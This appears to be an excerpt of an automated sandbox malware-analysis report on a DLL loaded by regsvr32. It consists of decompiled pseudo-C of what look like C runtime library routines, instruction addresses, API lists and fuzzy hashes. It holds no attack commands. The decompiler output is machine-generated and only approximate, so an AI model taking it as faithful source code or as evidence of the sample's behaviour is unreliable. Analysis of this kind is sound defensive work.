				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

































                                                                                                                                                                                                                    0x180003328
                                                                                                                                                                                                                    0x180003335
                                                                                                                                                                                                                    0x18000333a
                                                                                                                                                                                                                    0x180003341
                                                                                                                                                                                                                    0x180003348
                                                                                                                                                                                                                    0x18000334b
                                                                                                                                                                                                                    0x18000334f
                                                                                                                                                                                                                    0x180003359
                                                                                                                                                                                                                    0x180003363
                                                                                                                                                                                                                    0x180003368
                                                                                                                                                                                                                    0x18000336b
                                                                                                                                                                                                                    0x180003376
                                                                                                                                                                                                                    0x18000337d
                                                                                                                                                                                                                    0x180003382
                                                                                                                                                                                                                    0x180003385
                                                                                                                                                                                                                    0x18000338a
                                                                                                                                                                                                                    0x180003390
                                                                                                                                                                                                                    0x180003399
                                                                                                                                                                                                                    0x1800033a5
                                                                                                                                                                                                                    0x1800033af
                                                                                                                                                                                                                    0x1800033c0
                                                                                                                                                                                                                    0x1800033cb
                                                                                                                                                                                                                    0x1800033d1
                                                                                                                                                                                                                    0x1800033db
                                                                                                                                                                                                                    0x1800033e1
                                                                                                                                                                                                                    0x1800033e6
                                                                                                                                                                                                                    0x1800033ea
                                                                                                                                                                                                                    0x1800033f3
                                                                                                                                                                                                                    0x1800033fc
                                                                                                                                                                                                                    0x180003401
                                                                                                                                                                                                                    0x18000340c
                                                                                                                                                                                                                    0x180003412
                                                                                                                                                                                                                    0x18000341f
                                                                                                                                                                                                                    0x180003426
                                                                                                                                                                                                                    0x18000342c
                                                                                                                                                                                                                    0x180003436
                                                                                                                                                                                                                    0x180003438
                                                                                                                                                                                                                    0x180003441
                                                                                                                                                                                                                    0x18000344c
                                                                                                                                                                                                                    0x180003458
                                                                                                                                                                                                                    0x180003464
                                                                                                                                                                                                                    0x18000346a
                                                                                                                                                                                                                    0x180003478
                                                                                                                                                                                                                    0x18000347c
                                                                                                                                                                                                                    0x180003486
                                                                                                                                                                                                                    0x180003490
                                                                                                                                                                                                                    0x1800034a1
                                                                                                                                                                                                                    0x1800034a7
                                                                                                                                                                                                                    0x1800034ae
                                                                                                                                                                                                                    0x1800034be
                                                                                                                                                                                                                    0x1800034c9
                                                                                                                                                                                                                    0x1800034ce
                                                                                                                                                                                                                    0x1800034d1
                                                                                                                                                                                                                    0x1800034d6
                                                                                                                                                                                                                    0x1800034da
                                                                                                                                                                                                                    0x1800034df
                                                                                                                                                                                                                    0x1800034e4
                                                                                                                                                                                                                    0x1800034eb
                                                                                                                                                                                                                    0x1800034f1
                                                                                                                                                                                                                    0x1800034f5
                                                                                                                                                                                                                    0x1800034f9
                                                                                                                                                                                                                    0x180003508
                                                                                                                                                                                                                    0x180003517
                                                                                                                                                                                                                    0x180003521
                                                                                                                                                                                                                    0x180003524
                                                                                                                                                                                                                    0x180003528
                                                                                                                                                                                                                    0x18000352f
                                                                                                                                                                                                                    0x180003539
                                                                                                                                                                                                                    0x180003540
                                                                                                                                                                                                                    0x180003546
                                                                                                                                                                                                                    0x18000354c
                                                                                                                                                                                                                    0x180003554
                                                                                                                                                                                                                    0x180003558
                                                                                                                                                                                                                    0x18000355f
                                                                                                                                                                                                                    0x180003568
                                                                                                                                                                                                                    0x18000356c
                                                                                                                                                                                                                    0x180003570
                                                                                                                                                                                                                    0x180003574
                                                                                                                                                                                                                    0x180003578
                                                                                                                                                                                                                    0x18000357b
                                                                                                                                                                                                                    0x18000358c
                                                                                                                                                                                                                    0x18000358f
                                                                                                                                                                                                                    0x180003594
                                                                                                                                                                                                                    0x1800035a1
                                                                                                                                                                                                                    0x1800035a4
                                                                                                                                                                                                                    0x1800035aa
                                                                                                                                                                                                                    0x1800035ac
                                                                                                                                                                                                                    0x1800035c7
                                                                                                                                                                                                                    0x1800035d2
                                                                                                                                                                                                                    0x1800035d8
                                                                                                                                                                                                                    0x1800035de
                                                                                                                                                                                                                    0x1800035e0
                                                                                                                                                                                                                    0x1800035e6
                                                                                                                                                                                                                    0x1800035e8
                                                                                                                                                                                                                    0x1800035ee
                                                                                                                                                                                                                    0x1800035f4
                                                                                                                                                                                                                    0x180003612
                                                                                                                                                                                                                    0x18000361a
                                                                                                                                                                                                                    0x180003622
                                                                                                                                                                                                                    0x18000362d
                                                                                                                                                                                                                    0x180003635
                                                                                                                                                                                                                    0x18000363e
                                                                                                                                                                                                                    0x180003647
                                                                                                                                                                                                                    0x18000364c
                                                                                                                                                                                                                    0x180003651
                                                                                                                                                                                                                    0x180003656
                                                                                                                                                                                                                    0x18000365d
                                                                                                                                                                                                                    0x180003668
                                                                                                                                                                                                                    0x18000366b
                                                                                                                                                                                                                    0x180003672
                                                                                                                                                                                                                    0x180003684
                                                                                                                                                                                                                    0x18000368a
                                                                                                                                                                                                                    0x18000368e
                                                                                                                                                                                                                    0x180003690
                                                                                                                                                                                                                    0x18000369c
                                                                                                                                                                                                                    0x1800036a6
                                                                                                                                                                                                                    0x1800036b9
                                                                                                                                                                                                                    0x1800036c7
                                                                                                                                                                                                                    0x1800036d1
                                                                                                                                                                                                                    0x1800036d3
                                                                                                                                                                                                                    0x1800036db
                                                                                                                                                                                                                    0x1800036e2
                                                                                                                                                                                                                    0x1800036f1
                                                                                                                                                                                                                    0x180003704
                                                                                                                                                                                                                    0x180003709
                                                                                                                                                                                                                    0x18000371a
                                                                                                                                                                                                                    0x18000371e
                                                                                                                                                                                                                    0x180003721
                                                                                                                                                                                                                    0x180003726
                                                                                                                                                                                                                    0x18000372b
                                                                                                                                                                                                                    0x18000372f
                                                                                                                                                                                                                    0x180003736
                                                                                                                                                                                                                    0x18000373b
                                                                                                                                                                                                                    0x180003740
                                                                                                                                                                                                                    0x180003745
                                                                                                                                                                                                                    0x18000374b
                                                                                                                                                                                                                    0x180003754
                                                                                                                                                                                                                    0x180003763
                                                                                                                                                                                                                    0x18000376b
                                                                                                                                                                                                                    0x180003772
                                                                                                                                                                                                                    0x18000377a
                                                                                                                                                                                                                    0x18000377f
                                                                                                                                                                                                                    0x180003784
                                                                                                                                                                                                                    0x18000378e
                                                                                                                                                                                                                    0x1800037af

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                    • API String ID: 849930591-393685449
                                                                                                                                                                                                                    • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                                                                                                                                    • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                    			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0xaaf8a09cc6d2
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0xaaf8a09cc6d2
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

















                                                                                                                                                                                                                    0x18000a3dc
                                                                                                                                                                                                                    0x18000a3e1
                                                                                                                                                                                                                    0x18000a3e6
                                                                                                                                                                                                                    0x18000a3f8
                                                                                                                                                                                                                    0x18000a402
                                                                                                                                                                                                                    0x18000a418
                                                                                                                                                                                                                    0x18000a41f
                                                                                                                                                                                                                    0x18000a428
                                                                                                                                                                                                                    0x18000a42e
                                                                                                                                                                                                                    0x18000a437
                                                                                                                                                                                                                    0x18000a439
                                                                                                                                                                                                                    0x18000a43c
                                                                                                                                                                                                                    0x18000a444
                                                                                                                                                                                                                    0x18000a44d
                                                                                                                                                                                                                    0x18000a459
                                                                                                                                                                                                                    0x18000a45e
                                                                                                                                                                                                                    0x18000a464
                                                                                                                                                                                                                    0x18000a476
                                                                                                                                                                                                                    0x18000a47c
                                                                                                                                                                                                                    0x18000a488
                                                                                                                                                                                                                    0x18000a497
                                                                                                                                                                                                                    0x18000a499
                                                                                                                                                                                                                    0x18000a499
                                                                                                                                                                                                                    0x18000a49f
                                                                                                                                                                                                                    0x18000a4b0
                                                                                                                                                                                                                    0x18000a4b2
                                                                                                                                                                                                                    0x18000a4c6
                                                                                                                                                                                                                    0x18000a4c8
                                                                                                                                                                                                                    0x18000a4d0
                                                                                                                                                                                                                    0x18000a4dc
                                                                                                                                                                                                                    0x18000a4e8
                                                                                                                                                                                                                    0x18000a4f7
                                                                                                                                                                                                                    0x18000a4fd
                                                                                                                                                                                                                    0x18000a511
                                                                                                                                                                                                                    0x18000a517
                                                                                                                                                                                                                    0x18000a53d

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                    • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                                    • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                    			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                                                                                                                                    0x1800045bc
                                                                                                                                                                                                                    0x1800045c1
                                                                                                                                                                                                                    0x1800045c6
                                                                                                                                                                                                                    0x1800045e1
                                                                                                                                                                                                                    0x1800045ee
                                                                                                                                                                                                                    0x1800045fa
                                                                                                                                                                                                                    0x180004603
                                                                                                                                                                                                                    0x18000460c
                                                                                                                                                                                                                    0x180004615
                                                                                                                                                                                                                    0x180004621
                                                                                                                                                                                                                    0x180004626
                                                                                                                                                                                                                    0x18000462c
                                                                                                                                                                                                                    0x18000463b
                                                                                                                                                                                                                    0x180004641
                                                                                                                                                                                                                    0x180004647
                                                                                                                                                                                                                    0x18000464d
                                                                                                                                                                                                                    0x180004658
                                                                                                                                                                                                                    0x18000465a
                                                                                                                                                                                                                    0x18000465a
                                                                                                                                                                                                                    0x18000466f
                                                                                                                                                                                                                    0x180004671
                                                                                                                                                                                                                    0x180004679
                                                                                                                                                                                                                    0x180004685
                                                                                                                                                                                                                    0x180004691
                                                                                                                                                                                                                    0x1800046a0
                                                                                                                                                                                                                    0x1800046af
                                                                                                                                                                                                                    0x1800046af
                                                                                                                                                                                                                    0x1800046af
                                                                                                                                                                                                                    0x1800046ba
                                                                                                                                                                                                                    0x1800046bf
                                                                                                                                                                                                                    0x1800046cb
                                                                                                                                                                                                                    0x1800046d4
                                                                                                                                                                                                                    0x1800046d9
                                                                                                                                                                                                                    0x1800046e1
                                                                                                                                                                                                                    0x1800046e3
                                                                                                                                                                                                                    0x180004709

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                    • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                                    • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                    • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                                    • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                    • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                                    • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1967609040-0
                                                                                                                                                                                                                    • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                                    • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                    			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
